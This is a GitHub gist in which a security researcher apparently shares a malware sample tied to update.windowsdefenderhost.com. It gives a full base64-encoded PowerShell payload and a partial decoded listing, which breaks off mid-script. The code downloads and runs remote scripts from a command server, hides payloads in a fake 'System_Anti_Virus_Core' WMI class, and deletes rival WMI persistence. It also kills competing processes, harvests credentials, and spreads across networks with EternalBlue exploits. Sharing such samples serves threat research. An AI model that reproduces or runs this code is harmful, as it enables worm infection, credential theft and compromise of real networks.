Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/update.windowsdefenderhost.com

Created September 26, 2018 23:29
Show Gist options
  • Save JohnLaTwC/7dfadca92689344bf893a3ab5c7fcc38 to your computer and use it in GitHub Desktop.
Save JohnLaTwC/7dfadca92689344bf893a3ab5c7fcc38 to your computer and use it in GitHub Desktop.
Download ZIP
update.windowsdefenderhost.com related threats
Raw
update.windowsdefenderhost.com
## Uploaded by @JohnLaTwc
## 5c8fc3b6118f88463f19d21c7f9526d45b40b26b83c74d4e148a6510aeb440de
JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbwBtACcAKQAsACgAJwAxADEAMQAuADkAMAAuADEANQA5AC4AMQA0ADkAJwApACkADQAKACQAYQB2AGcAcwAgAD0AIABAACgAKQANAAoAJABuAGkAYwAgAD0AIAAnAHUAcABkAGEAdABlAC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbwBtACcADQAKAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQB7AA0ACgAJACQAcwB1AG0AIAA9ACAAMAANAAoACQAkAGMAbwB1AG4AdAAgAD0AIAAwAA0ACgAJAGYAbwByACgAJABqAD0AMQA7ACQAagAgAC0AbABlACAANAA7ACQAagArACsAKQB7AA0ACgAJAAkAJAB0AG0AcAAgAD0AIAAoACQAcABpAG4ALgBzAGUAbgBkACgAJABzAGUAWwAkAGkAXQApACkALgBSAG8AdQBuAGQAdAByAGkAcABUAGkAbQBlAA0ACgAJAAkAaQBmACAAKAAkAHQAbQBwACAALQBuAGUAIAAwACkAewANAAoACQAJAAkACQAkAGMAbwB1AG4AdAAgACsAPQAgADEADQAKAAkACQB9AA0ACgAJAAkAJABzAHUAbQAgACsAPQAgACQAdABtAHAADQAKAAkAfQANAAoACQBpAGYAIAAoACQAYwBvAHUAbgB0ACAALQBuAGUAIAAwACkAewANAAoACQAJAAkAJABhAHYAZwBzACAAKwA9ACAAJABzAHUAbQAvACQAYwBvAHUAbgB0AA0ACgAJAH0AZQBsAHMAZQB7AA0ACgAJAAkACQAkAGEAdgBnAHMAIAArAD0AIAAwAA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADAAKQB7AA0ACgAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbABlACAAMwAwADAAKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADAAXQANAAoACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkAfQANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAxACkAewANAAoACQAJAGkAZgAgACgAJABhAHYAZwBzAFsAMQBdACAALQBuAGUAIAAwACkAewANAAoACQAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbABlACAAJABhAHYAZwBzAFsAMQBdACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAwAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADAAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0AZQBsAHMAZQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAxAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AA0ACgAJAAkAfQANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAyACkAewANAAoACQAJAGkAZgAgACgAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAGwAZQAgADMAMAAwACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAyAF0ADQAKAAkACQAJAGIAcgBlAGEAawANAAoACQAJAH0ADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMwApAHsADQAKAAkACQBpAGYAIAAoACQAYQB2AGcAcwBbADMAXQAgAC0AbgBlACAAMAApAHsADQAKAAkACQAJAGkAZgAgACgAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAGwAZQAgACQAYQB2AGcAcwBbADMAXQApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMgBdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAyAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AGUAbABzAGUAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMwBdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkAfQANAAoAfQANAAoAJABuAGkAYwA9ACQAbgBpAGMAKwAoACcAOgAnACsAJwA0ADQAMwAnACkADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkADQAKAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsADQAKACAAIAAgACAAJAB2AGUAcgBfAHQAbQBwAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACQAdgBlAHIAXwB0AG0AcAApAHsADQAKACAAIAAgACAAIAAgACAAIABJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AYQBuAHQAaQB2AGkAcgB1AHMALgBwAHMAMQAiACkADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAVwBpAG4AZABvAHcAcwAgAEUAdgBlAG4AdABzACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwAA0ACgAkAGUAeABpAHMAdAA9ACQARgBhAGwAcwBlAA0ACgBpAGYAIAAoACQAcABzAGkAZABzACAALQBuAGUAIAAkAG4AdQBsAGwAIAApAA0ACgB7AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBlACAALQBlAHEAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAAgACAAIAAgAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAJABwAHMAaQBkAHMAWwAwAF0AIAAtAGUAcQAgACQAbABpAG4AZQBbAC0AMQBdACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAMAAgACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADQANAAiACkAKQAgACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAeABpAHMAdAA9ACQAdAByAHUAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgByAGUAYQBrAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBSAHUAbgBEAEQATwBTACAAIgB0AGEAcwBrAGgAbwBlAHQALgBlAHgAZQAiAA0ACgBLAGkAbABsAEIAbwB0ACgAJwBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADMAMwAzADMAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB2AGkAZAA9ACQAbABpAG4AZQBbAC0AMQBdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAGkAZAAgACQAZQB2AGkAZAAgAHwAIABzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwAgAC0AZgBvAHIAYwBlAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgBpAGYAIAAoACEAJABlAHgAaQBzAHQAIAAtAGEAbgBkACAAKAAkAHAAcwBpAGQAcwAuAGMAbwB1AG4AdAAgAC0AbABlACAAOAApACkADQAKAHsADQAKACAAIAAgACAAJABjAG0AZABtAG8AbgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAIAAtAE4AbwBuAEkAIAAtAFcAIABIAGkAZABkAGUAbgAgAGAAIgBgACQAbQBvAG4AIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAA7AGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABgACQAZgB1AG4AcwApACkAKQA7AEkAbgB2AG8AawBlAC0AQwBvAG0AbQBhAG4AZAAgACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIABgACQAUgBlAG0AbwB0AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAEAAKABgACQAbQBvAG4ALAAgAGAAJABtAG8AbgAsACAAJwBWAG8AaQBkACcALAAgADAALAAgACcAJwAsACAAJwAnACkAYAAiACIADQAKACAAIAAgACAAJAB2AGIAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwADQAKACAAIAAgACAAJAB2AGIAcwAuAHIAdQBuACgAJABjAG0AZABtAG8AbgAsADAAKQANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUADQAKACQAYQAsACAAJABOAFQATABNAD0AIABHAGUAdAAtAGMAcgBlAGQAcwAgACQAbQBpAG0AaQAgACQAbQBpAG0AaQANAAoADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQATgBTAF0AOgA6AEcAZQB0AEgAbwBzAHQAQgB5AE4AYQBtAGUAKAAkAG4AdQBsAGwAKQAuAEEAZABkAHIAZQBzAHMATABpAHMAdAANAAoAJABpAHAAcwB1ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAMQA3ACcAXQAuAFYAYQBsAHUAZQANAAoAJABzAGMAYgBhAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQATgBlAHQAdwBvAHIAawAgAGkAbgAgACQATgBlAHQAdwBvAHIAawBzACkADQAKAHsADQAKAA0ACgAgACAAIAAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcADQAKAAkAaQBmACAAKAAkAEkAUABBAGQAZAByAGUAcwBzACAALQBtAGEAdABjAGgAIAAnAF4AMQA2ADkALgAyADUANAAnACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAnADIANQA1AC4AMgA1ADUALgAyADUANQAuADAAJwANAAoAIAAgACAAIAAkAGkAcABzAF8AYwA9AEcAZQB0AC0AbgBlAHQAdwBvAHIAawByAGEAbgBnAGUAIAAkAEkAUABBAGQAZAByAGUAcwBzACAAJABTAHUAYgBuAGUAdABNAGEAcwBrAA0ACgAgACAAIAAgACQAaQBwAHMAXwBiAD0ARwBlAHQALQBJAHAASQBuAEIAIAAkAEkAUABBAGQAZAByAGUAcwBzAA0ACgAgACAAIAAgACQAaQBwAHMAPQAkAGkAcABzAF8AYwArACQAaQBwAHMAXwBiAA0ACgAJACQAdABjAHAAYwBvAG4AbgAgAD0AIABuAGUAdABzAHQAYQB0ACAALQBhAG4AbwBwACAAdABjAHAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJAAkACQBpAGYAIAAoACgAVABlAHMAdAAtAFAAbwByAHQAIAAkAGkAcAApACAALQBuAGUAIAAkAGYAYQBsAHMAZQAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHIAZQA9ADAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABhAC4AYwBvAHUAbgB0ACAALQBuAGUAIAAwACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsAJAByAGUAIAA9ACAAdABlAHMAdAAtAGkAcAAgAC0AaQBwACAAJABpAHAAIAAtAGMAcgBlAGQAcwAgACQAYQAgACAALQBuAGkAYwAgACQAbgBpAGMAIAAtAG4AdABsAG0AIAAkAE4AVABMAE0AIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcgBlACAALQBlAHEAIAAxACkAewAkAGkAcABzAHUAIAA9ACQAaQBwAHMAdQAgACsAIgAgACIAKwAkAGkAcAB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAdgB1AGwAPQBbAFAAaQBuAGcAQwBhAHMAdABsAGUALgBTAGMAYQBuAG4AZQByAHMALgBtADEANwBzAGMAXQA6ADoAUwBjAGEAbgAoACQAaQBwACkADQAKAAkACQAJAAkAaQBmACAAKAAkAHYAdQBsACAALQBhAG4AZAAgACQAaQAxADcAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkADQAKAA0ACgAJAAkACQAJAHsADQAKAAkACQAJAAkACQAkAHIAZQBzAD0AZQBiADcAIAAkAGkAcAAgACQAcwBjAA0ACgAJAAkACQAJAAkAaQBmACAAKAAhACgAJAByAGUAcwAgAC0AZQBxACAAJAB0AHIAdQBlACkAKQANAAoACQAJAAkACQAJAHsAZQBiADgAIAAkAGkAcAAgACQAcwBjAH0ADQAKAAkACQAJAAkACQAkAGkAMQA3ACAAPQAgACQAaQAxADcAIAArACAAIgAgACIAKwAkAGkAcAANAAoACQAJAAkACQB9AA0ACgAJAAkACQB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgAH0ADQAKAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAaQBwAHMAdQAnACAALAAkAGkAcABzAHUAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBQAHUAdAAoACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAaQAxADcAJwAgACwAJABpADEANwApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQA=
## decodes to:
$pin = new-object system.net.networkinformation.ping
$se=@(('update.windowsdefenderhost.com'),('111.90.159.149'))
$avgs = @()
$nic = 'update.windowsdefenderhost.com'
for($i=0;$i -le 3;$i++){
$sum = 0
$count = 0
for($j=1;$j -le 4;$j++){
$tmp = ($pin.send($se[$i])).RoundtripTime
if ($tmp -ne 0){
$count += 1
}
$sum += $tmp
}
if ($count -ne 0){
$avgs += $sum/$count
}else{
$avgs += 0
}
if ($i -eq 0){
if (($avgs[0] -le 300) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}
}
if ($i -eq 1){
if ($avgs[1] -ne 0){
if (($avgs[0] -le $avgs[1]) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}else{
$nic = $se[1]
break
}
}
}
if ($i -eq 2){
if (($avgs[2] -le 300) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}
}
if ($i -eq 3){
if ($avgs[3] -ne 0){
if (($avgs[2] -le $avgs[3]) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}else{
$nic = $se[3]
break
}
}
}
}
$nic=$nic+(':'+'443')
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
$ver_tmp=([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ver'].Value
if($ver -ne $ver_tmp){
IEX (New-Object Net.WebClient).DownloadString("http://$nic/antivirus.ps1")
return
}
}
$stime=[Environment]::TickCount
$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject
$dirpath=$env:SystemRoot+'\system32'
if (!(test-path $dirpath )){
$dirpath=$env:SystemRoot
}
if (!(test-path ($dirpath+'\msvcp120.dll')))
{sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
if (!(test-path ($dirpath+'\msvcr120.dll')))
